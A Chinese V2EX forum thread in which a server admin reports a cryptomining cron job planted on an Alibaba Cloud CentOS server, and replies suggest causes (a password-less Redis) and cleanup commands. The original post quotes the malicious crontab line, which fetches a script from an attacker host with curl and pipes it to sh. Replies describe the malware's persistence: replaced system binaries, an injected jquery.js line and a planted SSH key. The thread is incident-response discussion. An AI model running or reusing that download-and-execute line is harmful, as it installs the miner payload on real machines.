V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Distributions
Ubuntu
Fedora
CentOS
中文资源站
网易开源镜像站
guanhui07
V2EX  ›  Linux

求助,服务器 crontab 被人异常加入挖矿脚本

  •  
  •   guanhui07 · 2019-03-20 13:50:08 +08:00 · 5598 次点击
    这是一个创建于 2101 天前的主题,其中的信息可能已经有所发展或是发生改变。

    线上服务器 crontab 被人异常加入挖矿脚本 添加的脚本如下:

    */6 * * * * curl -fsSL http://w.3ei.xyz:43768/init.sh | sh > /dev/null 2>&1 
    

    服务器 阿里云 ceontos7 8 核心 8g 内存

    环境 openresty/1.13.6.2 mysql5.7 php7.2.6 redis rabbitmq

    ssh 修改了 35523 端口,禁止了 root 登录,但开了几个账号公司员工登录,密码足够复杂,

    过程如上..还没解决 ,有遇到的留言 讨论下 ,哪里漏洞 解决方法,谢谢

    23 条回复    2019-05-17 11:27:53 +08:00
    CallMeReznov
        1
    CallMeReznov  
       2019-03-20 13:56:02 +08:00   ❤️ 2
    我以为直接重装的我都够消极了
    没想到还有直接改 HOST 的

    大佬毕竟是大佬
    aulia
        2
    aulia  
       2019-03-20 13:57:39 +08:00 via Android
    你们机器上是不是有个空密码的 redis 在跑?
    Tink
        3
    Tink  
       2019-03-20 14:16:30 +08:00 via iPhone
    注释了就行
    BigPig666
        4
    BigPig666  
       2019-03-20 14:21:25 +08:00
    又不是不能用。。。
    guanhui07
        5
    guanhui07  
    OP
       2019-03-20 14:27:01 +08:00
    @aulia 是 但 redis 端口没开放给对外 ,bind 127.0.0.1
    zsy979
        6
    zsy979  
       2019-03-20 14:33:44 +08:00
    昨天刚发现测试环境跑了个 xmrig。。。 又不是不能用
    pmispig
        7
    pmispig  
       2019-03-20 14:37:52 +08:00
    估计 php 有漏洞被渗透获取了 webshell,你先检查下有没有奇怪的 php 文件
    d0m2o08
        8
    d0m2o08  
       2019-03-20 14:38:17 +08:00
    把 curl 和 wget 删掉,又不是不能用
    qsmy
        9
    qsmy  
       2019-03-20 14:58:20 +08:00
    还真不能用,一般都是挖门罗币,CPU 给你占满。redis 没设密码。被黑进服务器执行木马代码。定时还关不掉。高级的不止改 cron,还有伪造系统进程 httpdns、篡改系统文件 libntp.so 全程守护。
    wzaqqq
        10
    wzaqqq  
       2019-03-20 15:00:32 +08:00
    遇到过类似的,把常用命令感染了,比对下 ss netstat top 之类的二进制的时间,不放心就一个个换。
    qsmy
        11
    qsmy  
       2019-03-20 15:01:17 +08:00
    曾经分析过,感觉挺暴利的。原理还简单,利用 redis 无密码的越权漏洞,还写个 Python 扫局域网里有相同漏洞的机子。
    miyuki
        12
    miyuki  
       2019-03-20 15:03:46 +08:00 via Android
    redis 公网?
    miyuki
        13
    miyuki  
       2019-03-20 15:04:18 +08:00 via Android
    @miyuki 没仔细看,我瞎了

    建议重装吧
    viruser
        14
    viruser  
       2019-03-20 15:07:34 +08:00 via Android
    草(日本语),这玩意连 debug_info 都没删,那专杀脚本快出了,如果着急联系下搞安全的公司
    viruser
        15
    viruser  
       2019-03-20 15:37:58 +08:00 via Android
    我不是专业的人员,所以下面内容我也不知道有没有作用...这个软件总体原理和之前的几个挖矿软件类似,修改 crontab,修改 rm,拷贝挖矿本体,看看能不能用之前的脚本删除 crontab 里的内容,然后用 busybox rm 删除 /etc/pvds /etc/httpdz /etc/migrations 还有 /etc/init.d/ats, 检查 chkconfig, 最后检查下 /tmp 下的文件。最好在 /etc/hosts 里加上 127.0.0.1 w.3ei.xyz 127.0.0.1 w.21-3n.xyz
    glasslion
        16
    glasslion  
       2019-03-20 16:18:08 +08:00
    @guanhui07 是用的阿里云的专有网络还是经典网络?
    libook
        17
    libook  
       2019-03-20 16:31:51 +08:00
    Rootkit ?

    这个得亲自上机诊断才知道怎么解决吧,可以花钱找安全公司,不过有可能会比较贵。
    要是机器上没有业务数据或可以安全备份业务数据,可能重装重新部署会更快更有效。
    SSH 禁用密码只允许秘钥方式登录,然后所有服务都以非 root 最小权限方式运行,也可以考虑用容器直接隔离。
    rootww21
        18
    rootww21  
       2019-04-03 18:32:28 +08:00
    以前碰到过 redis 无密码 挖矿程序跑满
    tzwsoho
        19
    tzwsoho  
       2019-05-05 14:55:25 +08:00
    CentOS 6.9 Final 同样中毒,症状是 wloq 进程 CPU 100%。。
    我的处理是先把 /bin/sh 改名成 /bin/sh_ex,然后 /etc/hosts 加入
    127.0.0.1 w.3ei.xyz
    127.0.0.1 w.21-3n.xyz
    以上两步可以禁止脚本继续执行
    kill -9 `pidof httpdz`
    kill -9 `pidof migrations`
    kill -9 `pidof pvds`
    kill -9 `pidof wloq`
    kill -9 `pidof initdz`
    chattr -i /etc/httpdz /etc/wloq /etc/initdz /etc/pvds /etc/migrations
    rm -f /etc/httpdz /etc/migrations /etc/pvds /etc/initdz /etc/wloq
    然后
    chattr -i /var/spool/cron/root
    chmod a+s /var/spool/cron/root
    vi /var/spool/cron/root
    :%d
    :wq
    清空计划任务
    chattr -i ~/.ssh/authorized_keys
    chmod a+s ~/.ssh/authorized_keys
    vi ~/.ssh/autorized_keys
    在带有 Administrator@Guess 的那一行按 dd 删掉
    :wq
    这样基本就把挖矿病毒清理完了
    tzwsoho
        20
    tzwsoho  
       2019-05-05 14:59:37 +08:00
    另外我遇到的病毒还会在硬盘上所有 jquery*.js 的末尾加上一行代码
    find / -name 'jquery*.js'
    找出硬盘上所有相关文件,然后删掉这行代码
    baoshuai33
        21
    baoshuai33  
       2019-05-07 11:57:40 +08:00
    @tzwsoho rm 命令被替换了, 源文件被替换成了 rmm

    \mv /usr/bin/rmm /usr/bin/rm
    \mv /usr/bin/sh_ex /usr/bin/sh
    baoshuai33
        22
    baoshuai33  
       2019-05-07 12:03:48 +08:00
    @tzwsoho 根据这篇文章来看 https://www.anquanke.com/post/id/175725 还增加了个开机自启动脚本 ats :/etc/rc.d/init.d/ats
    vipdog73
        23
    vipdog73  
       2019-05-17 11:27:53 +08:00
    原本的 rm 命令被换成了 rmm。记得删掉 rmm -rf /usr/bin/rm 然后 mv /usr/bin/rmm /usr/bin/rm,如果删不掉记得看下权限。lsattr 看下是不是加了 ia 权限
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1193 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 25ms · UTC 18:16 · PVG 02:16 · LAX 10:16 · JFK 13:16
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.